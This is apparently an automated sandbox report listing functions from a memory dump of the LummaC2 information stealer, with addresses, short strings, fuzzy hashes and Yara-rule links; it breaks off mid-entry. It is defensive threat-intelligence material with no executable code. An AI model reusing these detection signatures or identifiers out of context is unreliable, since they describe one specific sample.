Function 006DC289 Relevance: 2.8, Strings: 2, Instructions: 309COMMON

Download Yara Rule

Strings

u, xrefs: 006DC364
@a, xrefs: 006DC2AF

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: @a$u
API String ID: 0-583156259
Opcode ID: b9b919d3cbbbd79838311a4a3e42617560b07971e051511478ac7534ce5622ed
Instruction ID: 5e284eda8d8ef5ddbba99bee77bf71cec1a833d1580feeee3938d82cc1d165a2
Opcode Fuzzy Hash: b9b919d3cbbbd79838311a4a3e42617560b07971e051511478ac7534ce5622ed
Instruction Fuzzy Hash: DC81C17050C3C18BD769CF3984607EBBBD2AF9A314F18896EE4C997382DB358506CB56

Function 006C683F Relevance: 2.8, Strings: 2, Instructions: 289COMMON

Download Yara Rule

Strings

gfff, xrefs: 006C6A5E
7, xrefs: 006C6991

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: d7f749ac3f313bb3f3fcd46246e406ae903dd2da6369720ef62c820a598e607b
Instruction ID: 018a71854fab4de718bb8609e0ecb431a2e9bdd652f87fbb0b81e55e00b25ce9
Opcode Fuzzy Hash: d7f749ac3f313bb3f3fcd46246e406ae903dd2da6369720ef62c820a598e607b
Instruction Fuzzy Hash: 8A9146B3A146114FD718CB28CC527AB77E3EBC4324F19C63DE895DB385EA7898068781

Function 006CAD81 Relevance: 2.8, Strings: 2, Instructions: 279COMMON

Download Yara Rule

Strings

CM, xrefs: 006CAF47
x3,-, xrefs: 006CAE6E

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: CM$x3,-
API String ID: 0-963954796
Opcode ID: 5251a77adb7da2c8d0925fecef25851438aa6cd823e73160b9452a04aeefbe2d
Instruction ID: 52b06cbb8aca669ebf7e6beb9f9c2133d879d65ff06360e9cc0b7b119c81e659
Opcode Fuzzy Hash: 5251a77adb7da2c8d0925fecef25851438aa6cd823e73160b9452a04aeefbe2d
Instruction Fuzzy Hash: 5C916FB4910B009FC7249F39C996A66BFF1FF0A314B448A5DE4D68BB95D330E406CB96

Function 006CD172 Relevance: 2.7, Strings: 2, Instructions: 241COMMON

Download Yara Rule

Strings

_8Y, xrefs: 006CD208
[U, xrefs: 006CD210

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: 8aa32aa2c3b6d80b94ec963e640d9908a932446a0d6d022a38a084a4962d919a
Instruction ID: 4c18830179fa33644f6b466257deb57f674fc6b419a071c93c04628f2872c1aa
Opcode Fuzzy Hash: 8aa32aa2c3b6d80b94ec963e640d9908a932446a0d6d022a38a084a4962d919a
Instruction Fuzzy Hash: 3B61FEB064C3508BD700DF24D851ABBB7F2EF92304F18996CE9848B395E739DA06C75A

Function 006CD189 Relevance: 2.7, Strings: 2, Instructions: 235COMMON

Download Yara Rule

Strings

_8Y, xrefs: 006CD208
[U, xrefs: 006CD210

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: [U$_8Y
API String ID: 0-1769107113
Opcode ID: f474135871930cec7fec8f295f5c22ac0302b5dc6e7018068b6c9b5df22e945e
Instruction ID: 3215bee3e13de0aa3e66c4eae16a909fbcf1dbeeeb1bd78435bd0bf4d2a59945
Opcode Fuzzy Hash: f474135871930cec7fec8f295f5c22ac0302b5dc6e7018068b6c9b5df22e945e
Instruction Fuzzy Hash: B751F0B064C3508BD700DF24D851ABBB7F2EF92314F18996CE9858B395E739CA06C75A

Function 006BF2A0 Relevance: 2.7, Strings: 2, Instructions: 201COMMON

Download Yara Rule

Strings

], xrefs: 006BF3BF
J, xrefs: 006BF424

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: J$]
API String ID: 0-1719541227
Opcode ID: 7da3f00d4d08d7383c129b56a8891c3c2865cac3d0d02ce3364d60daa64f24d4
Instruction ID: db4f89437e3a546f896069e521c62a0eab2378396af94c58b5c958565110c19d
Opcode Fuzzy Hash: 7da3f00d4d08d7383c129b56a8891c3c2865cac3d0d02ce3364d60daa64f24d4
Instruction Fuzzy Hash: D9611A73A1C7908BD3248B7888912DFBBD39BD6324F194A3ED8E5D73D2D57888468742

Function 006D3C60 Relevance: 2.7, Strings: 2, Instructions: 200COMMON

Download Yara Rule

Strings

b"}, xrefs: 006D3CED
Z[, xrefs: 006D3CE6

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: Z[$b"}
API String ID: 0-914116730
Opcode ID: 8a71feaadc09da7e26c90cb7acece5c6143ad752717163151d82ed1398d784b7
Instruction ID: 9bebf9302e746143c52e66233bb46a09437c6fe78b4007ea6e2a8c3db8c873dd
Opcode Fuzzy Hash: 8a71feaadc09da7e26c90cb7acece5c6143ad752717163151d82ed1398d784b7
Instruction Fuzzy Hash: 73610076A483109FE314CF69D88075FBAE2EBC5704F09C93DE9989B385C7B589058B93

Function 006C9820 Relevance: 2.7, Strings: 1, Instructions: 1444COMMON

Download Yara Rule

Strings

gd, xrefs: 006C9BE3

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: gd
API String ID: 2994545307-565856990
Opcode ID: 1c7afbab16cd4a1de02ce445c9d19600ce95e9dba061c2f088f0b78b3f5b2f52
Instruction ID: c183fbb0c7d5ebec3af92baa096cbc229c51e798ad3fb9d618b8e33e4d7d1cf6
Opcode Fuzzy Hash: 1c7afbab16cd4a1de02ce445c9d19600ce95e9dba061c2f088f0b78b3f5b2f52
Instruction Fuzzy Hash: 1A9221756083459FE724CF65D881B7BBBE3EBD4308F28882CE58687352D635AC45CB92

Function 006BE465 Relevance: 2.7, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

{L, xrefs: 006BE4BD
c, xrefs: 006BE46F

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: c${L
API String ID: 0-2217919563
Opcode ID: 1cb2c661ea45af6d01a057a915eba33034b9b177d98cc570745eba25eb8f1170
Instruction ID: 35c051e1f0b27af6be2c53a742c241e7a5e6c56eb48d3fd99aceaf0617e1306f
Opcode Fuzzy Hash: 1cb2c661ea45af6d01a057a915eba33034b9b177d98cc570745eba25eb8f1170
Instruction Fuzzy Hash: EB511472A0C3D04BD725CB24C8A13DF7BE3EBE5304F18493CD8C597292E6765A468742

Function 006D90B0 Relevance: 2.6, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

dV3T, xrefs: 006D90DA
5B3@, xrefs: 006D90C2

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 5B3@$dV3T
API String ID: 0-261990991
Opcode ID: 45285043d1f511b299e508889993e7e48ca9dde9f94627afeea345a76d541c27
Instruction ID: 5581298f5f40deefc62aa1951a974fef5941b1b9ca6ec35470b8dab0e29a3dd3
Opcode Fuzzy Hash: 45285043d1f511b299e508889993e7e48ca9dde9f94627afeea345a76d541c27
Instruction Fuzzy Hash: 3131CDB16083958FD3108F2A884075FFBF6BBD6704F149A2CE5D59B295C7B4C506CB06

Function 006C4A50 Relevance: 2.4, Strings: 1, Instructions: 1153COMMON

Download Yara Rule

Strings

D]+\, xrefs: 006C5160

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: D]+\
API String ID: 0-1174097187
Opcode ID: 1df501a6ed5447c7cd28019767448cf44a56a24150f117028f137498d1807f16
Instruction ID: fd4a2d55d040f752bf0f561ed430dbbb6e0cddcb4846c37a7221bf3c81eabda8
Opcode Fuzzy Hash: 1df501a6ed5447c7cd28019767448cf44a56a24150f117028f137498d1807f16
Instruction Fuzzy Hash: E3623475A093009FE7149F28EC92B7BB3A3FB95314F18592CE48697391EB35AD41CB81

Function 006CF700 Relevance: 1.8, Strings: 1, Instructions: 589COMMON

Download Yara Rule

Strings

2m, xrefs: 006CF711

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 2m
API String ID: 0-980373056
Opcode ID: 49ad42a7e759fcb626e92938411b48171e040b0b2a2c17b8efc142fd002e6379
Instruction ID: 49c1f466a0b911aef66a65faa1b70b8694545fbfa4d1a2d473f44e830bba23c1
Opcode Fuzzy Hash: 49ad42a7e759fcb626e92938411b48171e040b0b2a2c17b8efc142fd002e6379
Instruction Fuzzy Hash: A2525AB0519B818ED325CF3C88157A7BFE5AB5A324F044A9DE0EB877D2CB756001CB66

Function 006D66C0 Relevance: 1.8, Strings: 1, Instructions: 544COMMON

Download Yara Rule

Strings

:, xrefs: 006D67D6

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: :
API String ID: 0-3726092367
Opcode ID: 1aef26bf47b87e43f15bb2b37b242690d30eb1e9a50e0f7257efff866f0482cf
Instruction ID: 37d9c9af5581264cbb6bbecbc5c8395433ceaca3f882ae9928d1e6294d12c6f3
Opcode Fuzzy Hash: 1aef26bf47b87e43f15bb2b37b242690d30eb1e9a50e0f7257efff866f0482cf
Instruction Fuzzy Hash: 88F157B19187918FC3148F28D85126BBBE2EFC6314F08896EF5D58B381D779D906CB92

Function 006DA3B0 Relevance: 1.8, Strings: 1, Instructions: 504COMMON

Download Yara Rule

Strings

", xrefs: 006DA6C1

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 737f16272858f3ef337be2358f0e61d3c412c3fad82c308082b52e8dd245e745
Instruction ID: acfca4b0204854d3c48401527c7e1066b9e9e58577c80e1548440e1df794f721
Opcode Fuzzy Hash: 737f16272858f3ef337be2358f0e61d3c412c3fad82c308082b52e8dd245e745
Instruction Fuzzy Hash: E2F1F271E0C3415FC724CE68C450AABBBE7AFC5304F19896EE8998B382D634DD46C792

Function 006D7A40 Relevance: 1.6, Strings: 1, Instructions: 310COMMON

Download Yara Rule

Strings

2zm, xrefs: 006D7A26

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 2zm
API String ID: 0-1048405109
Opcode ID: 7a047842928798a16f8fb0d6b4cd4a45b040da9e4242031fdb59d1c60ac72764
Instruction ID: 048054666e62c67140742467ecd2aaafafc4af0cd55041c01a4b9e2c60c50b44
Opcode Fuzzy Hash: 7a047842928798a16f8fb0d6b4cd4a45b040da9e4242031fdb59d1c60ac72764
Instruction Fuzzy Hash: 7FB10431E08645CFDB148F28D8A17BDB7B3AF8A320F1942AAD5525B3D1DB319D51C740

Function 006B5E30 Relevance: 1.5, Strings: 1, Instructions: 265COMMON

Download Yara Rule

Strings

,, xrefs: 006B5F66

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 9ab895739d41f0ab865343ec625439abbeff1199f3a28a60c6668c61fd6c002f
Instruction ID: 1c9decc938664a0fc62d6f14b75e2a1fb1a8ae1f0a36e7d516974b9fb20f7b2b
Opcode Fuzzy Hash: 9ab895739d41f0ab865343ec625439abbeff1199f3a28a60c6668c61fd6c002f
Instruction Fuzzy Hash: 10B137B11097819FD321CF18C88069BFBE1AFA9704F444E2DF5D997382D631EA58CB66

Function 006E68A0 Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

Y, xrefs: 006E68AF

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID: InitializeThunk
String ID: Y
API String ID: 2994545307-3233089245
Opcode ID: 6c3a15209a4df6145f0adfd880b0ede10c8caf3efa680d29ac9bb27d1cdd49ca
Instruction ID: d87a14a1a0242e8f53b0c9b9f655cb1498272d9183152fb6aa465d131e548aa3
Opcode Fuzzy Hash: 6c3a15209a4df6145f0adfd880b0ede10c8caf3efa680d29ac9bb27d1cdd49ca
Instruction Fuzzy Hash: 8DA1043150D7D58FD3109A29D4802ABBFD39BE6364F188A6CF4D2873D2D675894ACB43

Function 006CDC50 Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

8, xrefs: 006CDDA6

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 57e6cab814ec88cd16e3482a6e4cdf5a262ae91b7baac8aa7739495bf6739d3c
Instruction ID: 0e799210af987b2ba4d633fd7e9561784e232315a3c4869e7593c61124e205c0
Opcode Fuzzy Hash: 57e6cab814ec88cd16e3482a6e4cdf5a262ae91b7baac8aa7739495bf6739d3c
Instruction Fuzzy Hash: 0671C523A4999047D728893C5C213BA7E938FE7330F2D877DE5B68B3E5D56548069341

Function 006DFEC0 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

8, xrefs: 006DFFF9

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 191058b0f630f242cfa70272c4b08b6ad5642e3a56aafee3787501d917061fbf
Instruction ID: f76141416ff2ea306f4f88a77c46857dd099ec7d43a9e0e6756393b553cd2f43
Opcode Fuzzy Hash: 191058b0f630f242cfa70272c4b08b6ad5642e3a56aafee3787501d917061fbf
Instruction Fuzzy Hash: 2F712823A4AAD047E329863D5C213BA7A834BD7334F2DC76EE5F68B3E1D56948468340

Function 006CA800 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

_, xrefs: 006CA8EC

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: c1934faac5d1bacb023041f415f1f32e9887fabe97ad2d2015a8eeac397f621a
Instruction ID: 825f1c1873d2599dd529288477306c221f955e539918dbac209c52ed2fa8ebbb
Opcode Fuzzy Hash: c1934faac5d1bacb023041f415f1f32e9887fabe97ad2d2015a8eeac397f621a
Instruction Fuzzy Hash: C461FC566182904ACB2CDF7488973777AE79F45308F1891AEC566CFBA7E934C1038785

Function 006EB813 Relevance: 1.4, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

,1, xrefs: 006EB9E3

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365179648.00000000006F7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365226451.0000000000701000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6b0000_LummaC2.jbxd

Similarity

API ID:
String ID: ,1
API String ID: 0-24929940
Opcode ID: 76532d35baab2b2a6e87754c0c52c10e4805ec0bc3b28648c905fa4809a8f950
Instruction ID: a7ca0553659631e43b17656212e4bc156d3c9912149b83204301fe84e43cb3da
Opcode Fuzzy Hash: 76532d35baab2b2a6e87754c0c52c10e4805ec0bc3b28648c905fa4809a8f950
Instruction Fuzzy Hash: 9D515471611B118BCB1DCF399CA157ABBE3FB56304318696DC492DB3A2EB399802CB54

Function 006CAAE0 Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

2wl, xrefs: 006CAAF0

Memory Dump Source

Source File: 00000002.00000002.3365095319.00000000006B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000002.00000002.3365079561.00000000006B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365123272.00000000006F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.3365138917.00000000006F3000.00000008.00000001.01000000.00000007.sdmpDownload File
